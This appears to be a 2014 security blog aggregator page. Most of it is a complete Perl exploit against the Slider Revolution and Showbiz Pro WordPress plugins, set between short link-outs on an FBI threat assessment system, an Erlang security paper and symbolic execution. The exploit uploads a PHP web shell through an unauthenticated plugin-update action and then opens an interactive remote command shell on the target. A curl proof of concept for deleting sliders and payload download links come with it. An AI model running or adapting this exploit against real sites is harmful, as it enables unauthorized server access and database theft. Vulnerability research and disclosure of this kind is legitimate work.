After he got through the obligatory introductory material about what the FBI does, what the challenges are, and how computer security at typical companies is done (or, in too many cases, not done) his presentation turned to a proposal for a particular new methodology for helping companies achieve some degree of security. That methodology is called CITAS – which stands for Computer Intrusion Threat Assessment System.

more here..........http://dillingers.com/blog/2014/11/24/citas-threat-assessment-system/

↧

Paper: Erlang Security 101

November 26, 2014, 4:25 am

≫ Next: Slider Revolution/Showbiz Pro shell upload exploit

≪ Previous: CITAS – Computer Intrusion Threat Assessment System

NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous
different programming languages. Some are well understood from a security perspective (e.g. C,
C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code
reviews for over four years and built up a body of knowledge on the subject. It is also understood that
proactive developer training and awareness earlier in the development lifecycle can yield significant
security benefits.

more here..........https://www.nccgroup.com/media/481611/erlang_security_101_v1-0.pdf

↧

Slider Revolution/Showbiz Pro shell upload exploit

November 26, 2014, 4:27 am

≫ Next: Close Encounters with Symbolic Execution

≪ Previous: Paper: Erlang Security 101

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content whith highly customizable, transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updading plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
#> POST /wp-admin/admin-ajax.php HTTP/1.1
#> User-Agent: curl/7.35.0
#> Host: ****.com
#> Accept: */*
#> Content-Length: 73
#> Content-Type: application/x-www-form-urlencoded
#>
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them it in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!

use LWP::UserAgent;
use MIME::Base64;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}

my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;

if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}

↧

Close Encounters with Symbolic Execution

November 26, 2014, 4:28 am

≫ Next: AT&T U-Verse VAP2500: The Passwords, They Do Nothing!

≪ Previous: Slider Revolution/Showbiz Pro shell upload exploit

At THREADS 2014, I demonstrated a new capability of mcsema that enables the use of KLEE, a symbolic execution framework, on software available only in binary form. In the talk, I described how to use mcsema and KLEE to learn an unknown protocol defined in a binary that has never been seen before. In the example, we learned the series of steps required to navigate through a maze. Our competition in the DARPA Cyber Grand Challenge requires this capability — our “reasoning system” will have no prior knowledge and no human guidance, yet must learn to speak with dozens, hundreds, or thousands of binaries, each with unique inputs.

more here........http://blog.trailofbits.com/2014/11/25/close-encounters-with-symbolic-execution/

↧